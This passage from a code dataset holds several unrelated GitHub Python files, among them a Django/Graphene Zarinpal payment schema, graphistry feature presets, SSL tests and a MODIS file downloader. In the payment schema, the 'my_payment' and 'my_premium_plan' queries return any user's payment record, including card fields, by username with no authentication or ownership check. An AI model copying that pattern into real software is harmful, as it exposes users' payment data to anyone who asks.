'ZARINPAL', None)\nclient = Client(zarinpal['sandbox']['request_url'])\n\n\n\nclass PremiumPlanObjectType(DjangoObjectType):\n class Meta:\n model = PremiumPlan\n fields = ['id', 'user', 'description', 'amount', \n 'started_date', 'finished_date']\n\n\n\nclass PaymentObjectType(DjangoObjectType):\n class Meta:\n model = Payment\n fields = ['id', 'user', 'plan', 'amount', 'status', 'authority', \n 'ref_id', 'card_pan', 'card_hash', 'date_created']\n\n\n\nclass ResultRequestObjectType(graphene.ObjectType):\n payment = graphene.Field(PaymentObjectType)\n startpay_link = graphene.String()\n\n\nclass PaymentRequestMutation(graphene.Mutation):\n class Arguments:\n amount = graphene.Float()\n\n information_need = graphene.Field(ResultRequestObjectType)\n register_url = graphene.String()\n\n\n def mutate(root, info, amount):\n if info.context.user.is_authenticated:\n result = client.service.PaymentRequest(\n zarinpal['merchant_id'],\n amount,\n \"Premium Plan for our website\",\n info.context.user.email,\n '09123456789',\n zarinpal['callback_url']\n )\n if result.Status == 100:\n payment = Payment.objects.create(\n amount=amount,\n user=info.context.user,\n authority=result.Authority\n )\n information_need = {\n 'payment': payment,\n 'startpay_link': zarinpal['sandbox']['startpay_url'].format(\n result.Authority\n )\n }\n return PaymentRequestMutation(\n information_need=information_need\n )\n logging.error(result)\n return PaymentRequestMutation(register_url='http://locahost/register')\n\n\n\nclass PaymentVerifyMutation(graphene.Mutation):\n class Arguments:\n id = graphene.Int()\n\n\n payment = graphene.Field(PaymentObjectType)\n\n\n def mutate(root, info, id):\n p = get_object_or_404(Payment, pk=id, \n user=info.context.user)\n result = client.service.PaymentVerification(\n zarinpal['merchant_id'],\n p.authority,\n p.amount\n )\n if result.Status == 100 or result.Status == 101:\n plan = PremiumPlan.objects.create(user=info.context.user)\n plan.set_finish_date()\n p.status = 'S'\n p.ref_id = result.RefID\n p.save()\n return PaymentVerifyMutation(payment=p)\n p.status = 'F'\n p.ref_id = result.RefID\n p.save()\n return PaymentVerifyMutation(payment=p)\n\n\n\nclass Mutation(graphene.ObjectType):\n payment_request_mutation = PaymentRequestMutation.Field()\n payment_verify_mutation = PaymentVerifyMutation.Field()\n\n\n\nclass Query(graphene.ObjectType):\n my_payment = graphene.Field(PaymentObjectType, username=graphene.String())\n my_premium_plan = graphene.Field(PremiumPlanObjectType, username=graphene.String())\n\n def resolve_my_payment(root, info, username):\n return get_object_or_404(Payment, user__username=username)\n\n def resolve_my_premium_plan(root, info, username):\n return get_object_or_404(PremiumPlan, user__username=username)\n\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"MohammadD3veloper/GrapheneBlog","sub_path":"plan/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"39154849913","text":"from collections import UserDict\nfrom .util import setup_logger\nfrom .constants import VERBOSE, TRACE\n\nlogger = setup_logger(\"graphistry.features\", verbose=VERBOSE, fullpath=TRACE)\n\n# ###############################################################\nUNK = \"UNK\"\nLENGTH_PRINT = 80\n# ################ Encoded Global Models #################\nEMBEDDING_MODEL_PATH = \"embedding.model\"\nTOPIC_MODEL_PATH = \"topic.model\"\nNGRAMS_MODEL_PATH = \"ngrams.model\"\nSEARCH_MODEL_PATH = \"search.model\"\n\n# ################ Actual Models #################\n# add specific instances of models here\n\n\n# ###############################################################################\n# ################# graphistry featurization config constants #################\nN_TOPICS = 42\nN_TOPICS_TARGET = 10\nHIGH_CARD = 4e7 # forces one hot encoding\nMID_CARD = 2e3 # todo: forces hashing\nLOW_CARD = 2\n\nCARD_THRESH = 40\nCARD_THRESH_TARGET = 400\n\nFORCE_EMBEDDING_ALL_COLUMNS = 0 # min_words\nHIGH_WORD_COUNT = 1024\nLOW_WORD_COUNT = 3\n\nNGRAMS_RANGE = (1, 3)\nMAX_DF = 0.2\nMIN_DF = 3\n\nN_BINS = 10\nKBINS_SCALER = \"kbins\"\nIMPUTE = \"median\" # set to\nN_QUANTILES = 100\nOUTPUT_DISTRIBUTION = \"normal\"\nQUANTILES_RANGE = (25, 75)\nN_BINS = 10\nENCODE = \"ordinal\" # kbins, onehot, ordinal, label\nSTRATEGY = \"uniform\" # uniform, quantile, kmeans\nSIMILARITY = None # 'ngram' , default None uses Gap\nCATEGORIES = \"auto\"\nKEEP_N_DECIMALS = 5\n\nBATCH_SIZE = 1000\nNO_SCALER = None\nEXTRA_COLS_NEEDED = [\"x\", \"y\", \"_n\"]\n# ###############################################################\n\n# ###############################################################\n# ################# enrichments\nNMF_PATH = \"nmf\"\nTIME_TOPIC = \"time_topic\"\nTRANSLATED = \"translated\"\nTRANSLATIONS = \"translations\"\nSENTIMENT = \"sentiment\"\n\n# ###############################################################\n# ############ The Search key\nSEARCH = \"search\"\n# ############ Embeddings keys\nTOPIC = \"topic\" # topic model embeddings\nEMBEDDING = \"embedding\" # multilingual embeddings\nQA = \"qa\"\nNGRAMS = \"ngrams\"\n# ############ Embedding Models\nPARAPHRASE_SMALL_MODEL = \"sentence-transformers/paraphrase-albert-small-v2\"\nPARAPHRASE_MULTILINGUAL_MODEL = (\n \"sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2\"\n)\nMSMARCO2 = \"sentence-transformers/msmarco-distilbert-base-v2\" # 768\nMSMARCO3 = \"sentence-transformers/msmarco-distilbert-base-v3\" # 512\nQA_SMALL_MODEL = \"sentence-transformers/multi-qa-MiniLM-L6-cos-v1\"\n# #############################################################################\n# Model Training Constants\n# Used for seeding random state\nRANDOM_STATE = 42\nSPLIT_LOW = 0.1\nSPLIT_MEDIUM = 0.2\nSPLIT_HIGH = 0.5\n\n# #############################################################################\nclass ModelDict(UserDict):\n \"\"\"Helper class to print out model names\n\n Args:\n message: description of model\n verbose: print out model names, logging happens regardless\n \"\"\"\n\n def __init__(self, message, verbose=True, *args, **kwargs):\n self._message = message\n self._verbose = verbose\n self._print_length = min(LENGTH_PRINT, len(message))\n self._updates = []\n super().__init__(*args, **kwargs)\n\n def __repr__(self):\n logger.info(self._message)\n if self._verbose:\n print(\"_\" * self._print_length)\n print()\n print(self._message)\n print(\"_\" * self._print_length)\n print()\n return super().__repr__()\n\n def update(self, *args, **kwargs):\n self._updates.append(args[0])\n if len(self._updates) > 1: # don't take first update since its the init/default\n self._message += (\n \"\\n\" + \"_\" * self._print_length + f\"\\n\\nUpdated: {self._updates[-1]}\"\n )\n return super().update(*args, **kwargs)\n\n\ndefault_featurize_parameters = dict(\n kind=\"nodes\",\n use_scaler=NO_SCALER,\n use_scaler_target=NO_SCALER,\n cardinality_threshold=CARD_THRESH,\n cardinality_threshold_target=CARD_THRESH_TARGET,\n n_topics=N_TOPICS,\n n_topics_target=N_TOPICS_TARGET,\n multilabel=False,\n embedding=False,\n use_ngrams=False,\n ngram_range=NGRAMS_RANGE,\n max_df=MAX_DF,\n min_df=MIN_DF,\n min_words=LOW_WORD_COUNT,\n model_name=MSMARCO2,\n impute=IMPUTE,\n n_quantiles=N_QUANTILES,\n output_distribution=OUTPUT_DISTRIBUTION,\n quantile_range=QUANTILES_RANGE,\n n_bins=N_BINS,\n encode=ENCODE, # kbins, onehot, ordinal, label\n strategy=STRATEGY, # uniform, quantile, kmeans\n similarity=SIMILARITY, # 'ngram'\n categories=CATEGORIES,\n keep_n_decimals=KEEP_N_DECIMALS,\n remove_node_column=True,\n inplace=False,\n feature_engine=\"auto\",\n memoize=True,\n)\n\n\n# #############################################################################\n# Create useful presets for the user\n# makes naming and encoding models consistently and testing different models against eachother easy\n# customize the default parameters for each model you want to test\n\n# Ngrams Model over features\nngrams_model = ModelDict(\"Ngrams Model\", verbose=True, **default_featurize_parameters)\nngrams_model.update(dict(use_ngrams=True, min_words=HIGH_CARD))\n\n# Topic Model over features\ntopic_model = ModelDict(\"Topic Model\", verbose=True, **default_featurize_parameters)\ntopic_model.update(\n dict(\n cardinality_threshold=LOW_CARD, # force topic model\n cardinality_threshold_target=LOW_CARD, # force topic model\n n_topics=N_TOPICS,\n n_topics_target=N_TOPICS_TARGET,\n min_words=HIGH_CARD, # make sure it doesn't turn into sentence model, but rather topic models\n )\n)\n\n# useful for text data that you want to paraphrase\nembedding_model = ModelDict(\n f\"{PARAPHRASE_SMALL_MODEL} Embedding Model\",\n verbose=True,\n **default_featurize_parameters,\n)\nembedding_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=PARAPHRASE_SMALL_MODEL, # if we need multilingual support, use PARAPHRASE_MULTILINGUAL_MODEL\n )\n)\n\n# useful for when search input is much smaller than the encoded documents\nsearch_model = ModelDict(\n f\"{MSMARCO2} Search Model\", verbose=True, **default_featurize_parameters\n)\nsearch_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=MSMARCO2,\n )\n)\n\n# Question Answering encodings for search\nqa_model = ModelDict(\n f\"{QA_SMALL_MODEL} QA Model\", verbose=True, **default_featurize_parameters\n)\nqa_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=QA_SMALL_MODEL,\n )\n)\n\n\nBASE_MODELS = {\n EMBEDDING: embedding_model,\n SEARCH: search_model,\n QA: qa_model,\n TOPIC: topic_model,\n NGRAMS: ngrams_model,\n}\n\n\nif __name__ == \"__main__\":\n # python3 -m graphistry.features -m 'my awesome edge encoded model' -p '{\"kind\":\"edges\"}'\n import argparse\n import json\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-m\", \"--model\", type=str, default=SEARCH, help=\"description of your model\"\n )\n parser.add_argument(\"-v\", \"--verbose\", type=bool, default=True)\n parser.add_argument(\"-p\", \"--model_params\", type=str)\n args = parser.parse_args()\n\n params = json.loads(args.model_params)\n print(\"----------- params -----------\")\n print(params)\n model = ModelDict(args.model, verbose=args.verbose, **default_featurize_parameters)\n model.update(params)\n print(model)\n","repo_name":"orgTestCodacy11KRepos110MB/repo-2761-pygraphistry","sub_path":"graphistry/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15845112134","text":"import ssl\nimport requests\nimport pytest\n\n\n@pytest.mark.usefixtures('active_app', 'ssl_port')\ndef test_ssl_fails_for_non_ssl_port(hostname, non_ssl_port):\n with pytest.raises(ssl.SSLError):\n requests.get(\"https://{0}:{1}\".format(hostname, non_ssl_port))\n\n\n@pytest.mark.usefixtures('active_app', 'non_ssl_port')\ndef test_non_ssl_fails_for_ssl_port(hostname, ssl_port):\n with pytest.raises(requests.ConnectionError):\n requests.get(\"http://{0}:{1}\".format(hostname, ssl_port))\n","repo_name":"vmalloc/Flask-Loopback","sub_path":"tests/test_ssl.py","file_name":"test_ssl.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"19613186120","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport subprocess\n\"\"\"\n事业部数量\n\"\"\"\n\n\ndef stastic_department(JOB_DICT):\n \"\"\"docstring for stastic_department\"\"\"\n dep_dict = {}\n with open('department.csv', 'wb') as f:\n for k, v in JOB_DICT.iteritems():\n if v['departmentName'] not in dep_dict:\n dep_dict[v['departmentName']] = 1\n else:\n dep_dict[v['departmentName']] += 1\n return dep_dict\n\ndef save_as_csv(dep_dict):\n \"\"\"docstring for save_as_csv\"\"\"\n with open('department.csv', 'wb') as f:\n f.write('事业部' + ',' + '数量' + '\\n')\n for k, v in dep_dict.iteritems():\n f.write(','.join([k, str(v)]).encode('utf-8') + '\\n')\n\n\ndef relation(dep_dict):\n \"\"\"docstring for relation\"\"\"\n entry_dict = {}\n with open(\"relation.dot\", \"wb\") as f:\n f.write(\"digraph 阿里事业部{\\n\")\n for lk in dep_dict.keys():\n kl = lk.split('-')\n for i in range(len(kl) - 1):\n entry = \"\\\"\" + kl[i].encode('utf8') + \"\\\" -> \\\"\" + kl[i+1].encode('utf8') + \"\\\";\\n\"\n if entry not in entry_dict:\n entry_dict[entry] = \"\"\n f.write(entry)\n f.write(\"}\")\n cmd = \"dot -Tpng -o 部门关系.png relation.dot\"\n subprocess.call(cmd, shell=True)\n return entry_dict\n\n\n","repo_name":"HalfdogStudio/Crawler","sub_path":"alibaba/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"38000581496","text":"class Solution(object):\n def arrayNesting(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n lar_nested_len = 0\n for i in range(len(nums)):\n lar_nested_len = max(lar_nested_len, self.array_nesting_helper(i, nums))\n return lar_nested_len\n\n def array_nesting_helper(self, index, nums):\n index_set = set()\n while index not in index_set:\n index_set.add(index)\n index = nums[index]\n return len(index_set)\n","repo_name":"komaljit/leetcode","sub_path":"556 Array_nesting.py","file_name":"556 Array_nesting.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8295271961","text":"# -*- coding: utf-8 -*- \n\"\"\" ++++++++++++++++++++++++++++++++++++++\n@product->name PyCharm\n@project->name growth_analysis\n@editor->name Sanliy\n@file->name download_product.py\n@create->time 2023/3/29-10:29\n@desc->\n++++++++++++++++++++++++++++++++++++++ \"\"\"\nimport os.path\n\nimport requests\n\n\nclass DownloadProduct:\n def __init__(self):\n self.token = None\n self.headers = None\n\n def get_token(self):\n with open(r\"D:\\grow_anay\\growth_analysis\\download\\base\\token.txt\", 'r') as f:\n self.token = f.read()\n\n def set_headers(self):\n self.headers = {\n \"Authorization\": \"Bearer \" + self.token\n }\n\n def download_file(self, file_url, start_date, end_date, area):\n print(file_url)\n file_path = os.path.join(\n os.path.dirname(\n os.path.dirname(__file__)\n ),\n \"data\",\n \"download\",\n f\"{start_date}_{end_date}_{area}\",\n \"hdf\"\n )\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n session = requests.Session()\n resp = session.get(url=file_url, headers=self.headers)\n file_size = resp.headers.get(\"Content-Length\")\n print(file_size)\n file_name = file_url.split(\"/\")[-1]\n file_name_with_path = os.path.join(file_path, file_name)\n\n with open(file_name_with_path, 'ab') as code:\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n code.write(chunk)\n code.flush()\n session.close()\n\n\nif __name__ == '__main__':\n dp = DownloadProduct()\n dp.get_token()\n dp.set_headers()\n dp.download_file(\n \"https://ladsweb.modaps.eosdis.nasa.gov/archive/allData/61/MOD03/2023/032/MOD03.A2023032.0210.061.2023032150218.hdf\")\n","repo_name":"sanliyang/growth_analysis","sub_path":"download/download_product.py","file_name":"download_product.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39332723293","text":"import numpy as np\nfrom glob import glob\n\n\ndef pick_random_state(octave):\n\n files = glob('/home/alexander/Documents/MATLAB/MPCfiles/*')\n n_files = len(files)\n\n # while True:\n\n i = np.random.choice(n_files)\n base_case = octave.loadcase(files[i])\n\n # Switch all lines on\n base_case['branch'][:, 10] = 1\n\n return base_case, files[i]\n","repo_name":"ADM91/PowerSystem-DL","sub_path":"system/pick_random_state.py","file_name":"pick_random_state.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"74925580572","text":"#coding: utf-8\nimport workflow\nimport editor\nfrom datetime import datetime, timedelta, date\n\n# get and format date\nrunningDate = date.today()\nformat = '%x'\ndateText = runningDate.strftime(format)\n\n# position cursor\neditor.set_selection(0) # move to beginning\n\n# insert text\neditor.insert_text('# ')\neditor.insert_text(dateText)\neditor.insert_text('\\n\\n\\n')\n\n# move back two characters\ncurrentSpot = editor.get_selection()\neditor.set_selection(currentSpot[0] - 2)","repo_name":"grahampcharles/editorial-workflows","sub_path":"NewDatedSection.py","file_name":"NewDatedSection.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25703340738","text":"import tensorflow as tf\nfrom typing import Dict, Callable, List\nfrom collections import ChainMap\n\nfrom tophat.constants import FGroup\nfrom tophat.embedding import EmbeddingMap\nfrom tophat.utils.xn_utils import \\\n preset_interactions, kernel_via_xn_sets, muls_via_xn_sets\nfrom tophat.nets.fc import simple_fc\n\n\nclass BilinearNet(object):\n \"\"\"Network for scoring interactions\n\n Args:\n embedding_map: Variables and metadata concerning categorical embeddings\n user_cat_cols: Name of user categorical feature columns\n item_cat_cols: Name of item categorical feature columns\n context_cat_cols: Name of context categorical feature columns\n interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n \"\"\"\n\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type='inter',\n ):\n self.embedding_map = embedding_map\n self.cat_cols = {\n FGroup.USER: user_cat_cols,\n FGroup.ITEM: item_cat_cols,\n FGroup.CONTEXT: context_cat_cols,\n }\n self.interaction_type = interaction_type\n self.num_meta = {}\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n embs_all = ChainMap(*embs_by_group.values())\n\n fields_d = {\n fg: self.cat_cols[fg]\n for fg in [FGroup.USER, FGroup.ITEM, FGroup.CONTEXT]\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n contrib_dot = kernel_via_xn_sets(interaction_sets, embs_all)\n # bias for cat feature factors\n contrib_bias = tf.add_n(list(biases.values()), name='contrib_bias')\n\n score = tf.add_n([contrib_dot, contrib_bias], name='score')\n\n return score\n\n\nclass BilinearNetWithNum(BilinearNet):\n \"\"\"Forward inference step to score a user-item interaction\n With the ability to handle numerical (visual) features based on [1]_\n\n Args:\n embedding_map:Variables and metadata concerning categorical embeddings\n num_meta: Metadata concerning numerical data\n `feature_name -> dimensionality of input`\n l2_vis: l2 regularization scale for visual embedding matrix\n ruin: If True, use the formulation of [1]_\n Else, use a modified formulation\n interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n\n References:\n .. [1] He, Ruining, and Julian McAuley. \"VBPR: Visual Bayesian \n Personalized Ranking from Implicit Feedback.\" AAAI. 2016.\n\n \"\"\"\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type: str = 'inter',\n num_meta: Dict[str, int] = None,\n l2_vis: float = 0.,\n ruin: bool = True,\n ):\n BilinearNet.__init__(self, embedding_map,\n user_cat_cols,\n item_cat_cols,\n context_cat_cols,\n interaction_type)\n\n self.ruin = ruin\n self.num_meta = num_meta or {}\n # Params for numerical features\n # embedding matrix for each numerical feature (fully connected layer)\n self.l2_vis = l2_vis\n self.W_fc_num_d = {}\n self.b_fc_num_d = {} # bias for fully connected\n self.b_num_factor_d = {}\n self.b_num_d = {} # vbpr paper uses this shady bias matrix (beta')\n with tf.name_scope('numerical_reduction'):\n\n self.reg_vis = tf.contrib.layers.l2_regularizer(scale=self.l2_vis)\n K2 = self.embedding_map.embedding_dim\n for feat_name, dim_numerical in self.num_meta.items():\n # vbpr: E\n self.W_fc_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_fc_embedder',\n shape=[dim_numerical, K2],\n initializer=tf.random_normal_initializer(\n stddev=1. / dim_numerical),\n regularizer=self.reg_vis,\n )\n if not self.ruin:\n # bias for E (not in paper)\n self.b_fc_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_fc_bias',\n shape=[self.embedding_map.embedding_dim],\n initializer=tf.zeros_initializer(),\n )\n # just a scalar\n self.b_num_factor_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_bias',\n shape=[1],\n initializer=tf.zeros_initializer(),\n )\n else:\n # vbpr: beta'\n self.b_num_d[feat_name] = tf.get_variable(\n name=f'{feat_name}_beta_prime',\n shape=[dim_numerical],\n initializer=tf.random_normal_initializer(\n stddev=1. / dim_numerical),\n regularizer=self.reg_vis,\n )\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n\n if self.embedding_map.vis_emb_user_col:\n emb_user_vis = tf.nn.embedding_lookup(\n self.embedding_map.user_vis,\n input_xn_d[self.embedding_map.vis_emb_user_col],\n name='user_vis_emb')\n else:\n emb_user_vis = None\n\n # Handle dense (fully connected reduction of dense features)\n # TODO: assume for now that all num feats are item-related\n # (else, need extra book-keeping)\n user_num_cols = []\n if self.ruin:\n item_num_cols = []\n else:\n item_num_cols = list(self.num_meta.keys())\n if self.ruin:\n num_emb_d = {\n feat_name: tf.matmul( # vbpr: theta_i\n input_xn_d[feat_name], self.W_fc_num_d[feat_name],\n name='item_vis_emb')\n # + self.b_fc_num_d[feat_name] # fc bias (not in vbpr paper)\n for feat_name in self.num_meta.keys()\n }\n else:\n num_emb_d = {\n feat_name: tf.matmul( # vbpr: theta_i\n input_xn_d[feat_name], self.W_fc_num_d[feat_name],\n name='item_vis_emb')\n + self.b_fc_num_d[feat_name] # fc bias (not in vbpr paper)\n for feat_name in self.num_meta.keys()\n }\n\n # TODO: temp assume num are item features (not vbpr)\n embs_by_group[FGroup.ITEM].update(num_emb_d)\n\n embs_all = ChainMap(*embs_by_group.values())\n\n fields_d = {\n FGroup.USER:\n self.cat_cols[FGroup.USER] + user_num_cols,\n FGroup.ITEM:\n self.cat_cols[FGroup.ITEM] + item_num_cols,\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n contrib_dot = kernel_via_xn_sets(interaction_sets, embs_all)\n # bias for cat feature factors\n if len(biases.values()):\n contrib_bias = tf.add_n(list(biases.values()),\n name='contrib_bias')\n else:\n contrib_bias = tf.zeros_like(contrib_dot,\n name='contrib_bias')\n\n if self.b_num_factor_d.values():\n # bias for num feature factors\n contrib_bias += tf.add_n(list(self.b_num_factor_d.values()))\n # NOTE: vbpr paper uses a bias matrix beta that we take a\n # dot product with original numerical\n if self.b_num_d:\n contrib_vis_bias = tf.add_n( # vbpr: beta * f\n [tf.reduce_sum(\n tf.multiply(input_xn_d[feat_name],\n self.b_num_d[feat_name]),\n 1, keep_dims=False\n ) for feat_name in self.num_meta.keys()],\n name='contrib_vis_bias'\n )\n else:\n contrib_vis_bias = tf.zeros_like(contrib_bias,\n name='contrib_vis_bias')\n\n # TODO: manually create visual interaction\n if len(num_emb_d):\n contrib_vis_dot = tf.add_n([\n tf.reduce_sum(\n # theta_u.T * theta_i\n tf.multiply(emb_user_vis, num_emb), 1, keep_dims=False)\n for feat_name, num_emb in num_emb_d.items()\n ], name='contrib_vis_dot')\n else:\n contrib_vis_dot = tf.zeros_like(contrib_bias,\n name='contrib_vis_dot')\n\n score = tf.add_n([contrib_dot,\n contrib_bias,\n contrib_vis_dot,\n contrib_vis_bias],\n name='score')\n return score\n\n\nclass BilinearNetWithNumFC(BilinearNet):\n \"\"\"POC to replace the inner product potion with FC layers as described in\n [2]_ and [3]_\n\n Args:\n embedding_map: Variables and metadata concerning categorical embeddings\n num_meta: Metadata concerning numerical data\n `feature_name -> dimensionality of input`\n interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n deep_net_fn: function to create deep portion of network\n deep_reg: regularizer for deep portion of network\n\n References:\n .. [2] He, Xiangnan, et al. \"Neural collaborative filtering.\" \n Proceedings of the 26th International Conference on World Wide \n Web. International World Wide Web Conferences Steering \n Committee, 2017.\n \n .. [3] Xiangnan He and Tat-Seng Chua (2017). Neural Factorization \n Machines for Sparse Predictive Analytics. In Proceedings of \n SIGIR '17, Shinjuku, Tokyo, Japan, August 07-11, 2017.\n \"\"\"\n\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type: str = 'inter',\n num_meta: Dict[str, int] = None,\n deep_net_fn: Callable = simple_fc,\n deep_reg=None,\n ):\n BilinearNet.__init__(self, embedding_map,\n user_cat_cols,\n item_cat_cols,\n context_cat_cols,\n interaction_type)\n\n self.num_meta = num_meta or {}\n self.deep_net_fn = deep_net_fn\n self.deep_reg = deep_reg\n\n def forward(self, input_xn_d: Dict[str, tf.Tensor]) -> tf.Tensor:\n \"\"\"Forward inference step to score a user-item interaction\n \n Args:\n input_xn_d: Dictionary of feature names to category codes\n for a single interaction\n\n Returns:\n Forward inference scoring operation\n\n \"\"\"\n\n # Handle sparse (embedding lookup of categorical features)\n embs_by_group, biases = self.embedding_map.look_up(\n input_xn_d, self.cat_cols)\n\n num_emb_d = {\n feat_name: input_xn_d[feat_name]\n for feat_name in self.num_meta.keys()\n }\n\n embs_all = ChainMap(*embs_by_group.values(), num_emb_d)\n\n fields_d = {\n fg: self.cat_cols[fg]\n for fg in [FGroup.USER, FGroup.ITEM, FGroup.CONTEXT]\n }\n\n interaction_sets = preset_interactions(\n fields_d, interaction_type=self.interaction_type)\n\n with tf.name_scope('interactions'):\n xn_muls = muls_via_xn_sets(interaction_sets, embs_all)\n # Bi-Interaction (actually, we allow for >=2 interactions)\n f_bi = tf.add_n([node for s, node in xn_muls.items()\n if len(s) > 1],\n name='f_bi')\n\n contrib_deep = tf.identity(\n self.deep_net_fn(f_bi, self.deep_reg, scope_name='deep'),\n name='contrib_deep')\n contrib_bias = tf.add_n(list(biases.values()), name='contrib_bias')\n\n score = tf.add_n([contrib_deep, contrib_bias], name='score')\n\n return score\n\n","repo_name":"JasonTam/tophat","sub_path":"tophat/nets/bilinear.py","file_name":"bilinear.py","file_ext":"py","file_size_in_byte":13786,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"34674071008","text":"import sys, math\nfrom collections import deque\n\ninput = sys.stdin.readline\nINF = sys.maxsize\n\n\ndef solve():\n n, k = map(int, input().split())\n dp = [[0 if i != 0 else 1 for i in range(k + 1)] for _ in range(n + 1)]\n\n for i in range(1, n + 1):\n cnt = int(input())\n for j in range(1, k + 1):\n dp[i][j] = dp[i - 1][j] + dp[i][j - cnt]\n\n print(dp[n][k])\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"kkIIun/Tobigs18_assignment","sub_path":"week5/Algorithm/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17736445659","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os\nimport re\nimport sys\n\nWHISKEY_HOMEDIR = os.environ['WHISKEY_HOMEDIR']\nWHISKEY_DOTDIR = os.path.join(WHISKEY_HOMEDIR, '.whiskey')\n\nCONFIG_FILE = os.path.join(WHISKEY_HOMEDIR,\n '.whiskey/apache/build/config_vars.mk')\n\nCONFIG = {}\n\nwith open(CONFIG_FILE) as fp:\n for line in fp.readlines():\n name, value = line.split('=', 1)\n name = name.strip()\n value = value.strip()\n CONFIG[name] = value\n\n_varprog = re.compile(r'\\$(\\w+|(?:\\{[^}]*\\}|\\([^)]*\\)))')\n\ndef expand_vars(value):\n if '$' not in value:\n return value\n\n i = 0\n while True:\n m = _varprog.search(value, i)\n if not m:\n break\n i, j = m.span(0)\n name = m.group(1)\n if name.startswith('{') and name.endswith('}'):\n name = name[1:-1]\n elif name.startswith('(') and name.endswith(')'):\n name = name[1:-1]\n if name in CONFIG:\n tail = value[j:]\n value = value[:i] + CONFIG.get(name, '')\n i = len(value)\n value += tail\n else:\n i = j\n\n return value\n\ndef get_vars(name):\n value = CONFIG.get(name, '')\n sub_value = expand_vars(value)\n while value != sub_value:\n value = sub_value\n sub_value = expand_vars(value)\n return sub_value.replace('/app/.whiskey', WHISKEY_DOTDIR)\n\nCONFIG['PREFIX'] = get_vars('prefix')\nCONFIG['TARGET'] = get_vars('target')\nCONFIG['SYSCONFDIR'] = get_vars('sysconfdir')\nCONFIG['INCLUDEDIR'] = get_vars('includedir')\nCONFIG['LIBEXECDIR'] = get_vars('libexecdir')\nCONFIG['BINDIR'] = get_vars('bindir')\nCONFIG['SBINDIR'] = get_vars('sbindir')\nCONFIG['PROGNAME'] = get_vars('progname')\n\n_CFLAGS_NAMES = ['SHLTCFLAGS', 'CFLAGS', 'NOTEST_CPPFLAGS',\n 'EXTRA_CPPFLAGS', 'EXTRA_CFLAGS']\n\n_CFLAGS_VALUES = []\n\nfor name in _CFLAGS_NAMES:\n value = get_vars(name)\n if value:\n _CFLAGS_VALUES.append(value)\n\nCONFIG['CFLAGS'] = ' '.join(_CFLAGS_VALUES)\n\nif sys.argv[1] == '-q':\n 